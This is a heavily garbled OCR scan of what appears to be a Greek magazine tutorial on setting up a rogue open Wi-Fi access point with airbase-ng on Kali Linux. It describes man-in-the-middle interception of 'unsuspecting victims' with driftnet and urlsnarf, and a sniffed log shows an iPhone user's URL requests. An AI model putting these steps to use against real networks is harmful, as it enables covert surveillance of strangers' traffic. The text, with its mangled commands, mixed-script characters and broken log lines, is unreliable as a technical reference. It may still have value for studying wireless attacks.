UP BROADCAST RUNNING MULTICAST MTU;1500 Metric:1 ἩΡῚ E 


~ : airbase-ng 2» 


RX packets:1250 errors: dropped:0 overruns:0 frame:0 
TX packets:1645 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:500 


1 
- ө 
- le 
E 
RX bytes:163681 (159.8 KiB) TX bytes:768367 (750.3 KiB) 5 


2 
1 
-36 
-52 
1 
1 


63 
7 CAVALLI 
5 


1 
Link encap:Ethernet HwWadg - Р 9 
|гоосеКа1164сиѕ:-# airbase-ng --essid CharactersWelcome -c 11 mono 
18:11:46 Created tap interface ato 
Trying to set MTU on αἴθ to 1500 
Trying to set MTU on ποπθ to 1800 
Access Point with 85510 00:C0:CA:52:AB:B4 started. 
Client CC:08: associated (unencrypted) to ESSID: "CharactersWelcome" 
18:34:53 Client 90:FB: associated (unencrypted) to ESSID: “CharactersWelcome" 
Link епсар Π 
inet addr: 
inet6 addr: = 7:airbase-ng 
UP LOOPBACK Ñ 


collisions:0 
RX bytes:4974669 


Link encap:UNSPEC HWadd PCA-52- ABSES- 3A-30-. 

UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU 

RX packets:89887 еггог5:0 dropped:4499 overruns:0 frame? 

ТХ packets: 0 errors:0 dropped:O overruns:0 carrier :0 > Mace 

collisions:0 txqueuelen: 1000 =f E! [= [Mac Pro at a glance 


RX bytes: 16019980 (15.2 MiB) TX bytes:O (0.0 B) 


Link encap:Ethernet HWaddr 00:с0 

inet addr:192.158.85.10 Bcast:192.168.85.255  Maski255.255.255.0 
inet6 addr: fe! 1 

UP BROADCAST RUNNING MULTICAST 

RX packe ггог5:0 dropped:0 overruns:O frame:0 

TX packe 7 errors:0 dropped:0 overruns:O carrier: 
collisions:0 txqueuelen:0 

RX bytes:2343105 (2,2 MiB) TX bytes:315878 (308,4 KiB) 


Link encap:Ethernet HWaddr 00:с0 

BROADCAST MULTICAST MTU:1500 Metric:1 

RX packets:0 errors;0 dropped: overruns:O #гапе:0 
TX packets:0 errors:0 dropped: overruns:0 carrier: 
collisions:0 txqueuelen: 1000 

RX bytes:0 (0.0 B) TX bytes:@ (0.0 B) 


|гоотака1164си5: ~# [] 


Н επίθεση MiTM εἰναι σε εξέλιξη κι о attacker χρησιμοποιεί ro εργαλείο driftnet, 
προκειμένου να βλέπει kai να αποθηκεύει Τις εικόνες στα Sites που επισκέπτονται 
τα ανυποψίαστα θὐματά του. 
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UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:6 errors:@ dropped:0 омеггип5:д frame:0 

X packets:6 errors:0 dropped:0 overruns:@ carrier:@ 

collisions:@ txqueuelen:0 

RX bytes:1446 (1.4 KiB) 
Βήμα 6 


TX bytes:468 (468.0 B) 


Телеџтајо βήμα εἶναι η ενεργοποίηση rou IP forwarding μεταξύ rov network 
interfaces: 


root@kali64cus :~# 


Δοκιμές kai δυνατότητες 


Δοκιμάστε να συνδεθείτε στο ασύρματο δίκτυο ονόματι CharactersWelcome, ano 
£vav οποιονδήποτε wireless client. Αν όλα ἐχουν πάει кала η σύνδεση θα επιτευχθεὶ 
χωρίς προβλήματα και χωρίς φυσικά να ζητηθεἰ κἄποιο password (έχουμε φτιάξει 
ἑνα ανοικτὀ ασύρματο δίκτυο). О client θα πάρει διεύθυνση ІР апо Tov DHCP server 
μπροστὰ ano ro Kali (και στο πλαίσιο του παραδεἰγματὸς µας, апо ro εὖρος διευθύν- 
σεων 192.168.80.100-150). 


Απότη στιγµή nou ὀληη δικτυακἠ κίνηση των wireless clients Tou CharactersWelcome 
περνά ano ra network interfaces του Kali, έχουμε ουσιαστικά πετύχει µια επίθεση 
ΜΙΤΜ εναντίον τους. Пера ano το κλασικὀ, уорісооре, Wireshark, ката τη διάρ- 
κεια των πειραματισμὠν σας δοκιμάστε τα driftnet και urlsnarf. Δείτε τα σχετικἁ 
screemshots µε τις περιγραφές τους, αλλά κυρίως πειραμµατιστεἰτε. Кал σας δια- 
σκἐδαση! 


a ~: urlsnarf vow 
File Edit View Bookmarks Settings Help 
subZrawsiPhone4.parabing.net - 
IsubZrawsiPhone4.parabing.net - - 
subZzrawsiPhone4.parabing.net - - [30/Dec/2013 
|18554a (iPhone; U; CPU 05 7 0 4 like Мас 05 X 
lsubZrawsiPhone4.parabing.net - - [30/Dec/2013 
.parabing.net - - [30/Dec/2013 
.parabing.net - - [30/Dec/2013 
.parabing.net - - [30/Dec/2013 
like Mac 05 X; en us)" 
[subZrawsiPhone4.parabing 
|subZrawsiPhone4.parabing. 


[30/Dec/2013:01:10:31 
[30/Dec/2013 


"Podcasts/2.0" 
"Podcasts/2.0" 
on/jnite/bsd-0015-mp3.mp3 HTTP/1.1" - 


*0200] " 
+0200] "i 
+0200] "i 


http: 
http: 
http: 


//feeds .feedburner.com/BsdNowMp3 HTTP/1.1 
//feeds .feedburner.con/Bsdtalk HTTP/1. 
//wwi. podtrac.con/pts/redirect mp3/traffic.libsyn "AppleCoreMedia/1.0.0.1| 
+0200] 
+0200] 
+0200] 
+02001 "i 


http: 
http 
http 
http: 


//leo.am/podcasts/sn HTTP/1.1" - - 
/teoville.tv/podcasts/mbw.xml HTTP/1. 

/feeds ,feedburner.con/techsnapnp3 HITP/L.1" - - 
//traffic.Libsyn.con/jnite/bsd-0015-mp3.mp3 HTTP/1.1 


AppleCoreMedia/1.0.0.118554a (iPhone; U; CPU 05 7 0 4 1 


fet - - 
net - - 


[30/Dec/2013 
[30/Dec/2013 


+0200] "i 
+0200] "i 


http: 
http 


Podcasts/2.0" 
/leoville.tv/podcasts/kfi.xml HTTP/1. 

|subZrawsiPhone4.parabing.net - - [30/Dec/2013 40200] "GET http: //feeds. feedburner .com/BsdNowMp3 HTTP/1.1" 

jsubZrawsiPhone4.parabing.net - - [30/Dec/2013 +0200] "GET http://ec.libsyn.com/p/c/9/5/c9567d05f0731107/bsd-0015-mp3. npa? d13a76d516d9dec20c3d276ce028ed5089ab1ce3dae902ea1d01c08f34d7 
cc595ecd&c id-6534154 HTTP/1.1" - "AppleCoreMedia/1.0.0.118554a (iPhone; U; CPU OS 7 0 4 like Мас OS X; en us)" 
|subZrawsiPhone4.parabing.net - - 139/0ec/2013 1:10:46 +0200] "GET http://feeds.feedburner.com/Bsdtalk HTTP/1.1" - - 
|subZrawsiPhone4.parabing.net 147 +0200] "GET http://feeds.feedburner.com/techsnapmp3 HTTP/1.1 


“Podcasts/2,0" 
"Podcasts/2.0" 


|subZrawsiPhone4.parabing.net - 
|cc595ecd&c id-6534154 HTTP/1. 


|subZrawsiPhone4.parabing.net 
|subZrawsiPhone4.parabing.net 
|cc595ecd&c id-6534154 HTTP/1 


013:01:10:47 +0200] 


ppleCoreMedia/1.0.0 


 [30/Dec/2013 


/2013:01:10:50 +0200] 


AppleCoreMedia/1.0.0.118554a (iPhone; 


GET http://ec.libsyn.com/p/c/9/5/c9567d05f0731107/bs 


15-mp3.mp3?d13a76d516d9dec20c3d276ce028ed5089ab1ce3dae902ea1d01c08f34d7 


18554а (iPhone; U; CPU OS 7 0 4 like Мас 05 
GET http://leo,am/podcasts/sn HTTP/1,1" 
GET http://ec.libsyn.com/p/c/9/5/c956705f0731107/bsd-0015-mp3.mp3? 
U; CPU OS 7 0 4 like Mac OS X; en us)" 


13a76d516d9dec20c3d276ce028ed5089ab1ce3dae902eald01c08f34d7 


139/0ес/2013:01:10 
[30/Dec/2013 

- [30/Dec/2013 

- [30/Dec/2013 

- [30/Dec/2013 


.parabing "Podcasts/2.0" 
.parabing 
.parabing. 
.parabing. 
.parabing 
.parabing. 
.parabing 
.parabing. 
.parabing 
.parabing 
.parabing 
.parabing. 
.parabing 
.parabing 
.parabing 
.parabing. 
.parabing 
.parabing 
.parabing 
.parabing 
.parabing 
.parabing 
.parabing 
.parabing 
.parabing. 
.parabing. 
subZrawsiPhone4.parabing 
[subZrawsiPhone4.parabing 


http: 
http: 
http 
http 
http: 
http: 
http: 
http: 


//feeds. feedburner. con/TheLinuxActionShow ΗΤΤΕΣ 


/feeds.feedburner.com/Bsdtalk HTTP/1. 
//leoville.tv/podcasts/mbw. xml HTTP/1. 
//feeds.feedburner.con/techsnapmp3 HTTP/1.1" - - 
//eo,an/podcasts/sn HTTP/1.1" "Podcasts/2 
//feeds. feedburner . con/TheLinuxActionShow HTTP/L. 

HTTP/1. 

/feeds .feedburner.com/BsdNowMp3 HTTP/. 

/feeds.feedburner,com/Bsdtalk HTTP/1.1 

/feeds . feedburner .com/techsnapnp3 

/teo.am/podcasts/sn HTTP/1.1" - - 

/teoviie.tv/podcasts/mbw.xml HITP/1.1" - 

/feeds .feedburner. con/ThelinuxActionShow HTTP/ 

/leoville.tv/podcasts/kfi.xml HTTP/1. 

/feeds, feedburner .com/BsdNowMp3 HTTP/1.1" 
//feeds . feedburner .com/Bsdtalk HTTP/1. 

//feeds. feedburner .com/techsnapmp3 HTTP/1.1" - - 
//teo.am/podcasts/sn HTTP/1.1" - - "Podcasts/2. 
//feeds feedburner .com/TheLinuxActionShow HTTP/1 

/leoville.tv/podcasts/mbw. xml HTTP/1. 

/feeds , feedburner. com/BsdNowMp3 HTTP/. 

/teoville.tv/podcasts/kfi.xml HTTP/l 

/feeds , feedburner .com/techsnapnp3 

/ieo.am/podcasts/sn HTTP/1.1" - - 

/feeds  feedburner.con/Bsdtalk HTTP/1 
//leoville.tv/podcasts/mbw, xml HTTP/1. 


"Podcasts/2.0" 
- - [30/Dec/2013 
- - [30/Dec/2013 

- [30/Dec/2013 


"Podcasts/2.0" 


http 
http 
http 
http 
http 
http 
http 
http 
http: 
http: 
http: 
http: 
http 
http 
http 
http 
http 
http: 
http: 


[30/Dec/2013 
- [30/Dec/2013 
- [30/Dec/2013 


- [30/Dec/2013 
- [30/Dec/2013 
[30/Dec/2013 
[30/Dec/2013 
[30/Dec/2013 
[30/Dec/2013 
[30/Dec/2013: 


'odcasts/2.0" 
odcasts/2.0" 


40200] "i 


ЕЦ 


Σε éva алло τερματικό o attacker τρέχει ro urlsnarf, ооте να βλέπει τις διευθύνσεις 
(URLs) που επισκέπτονται oi clients του ελεύθερου WAP που EXE! στήσει. 
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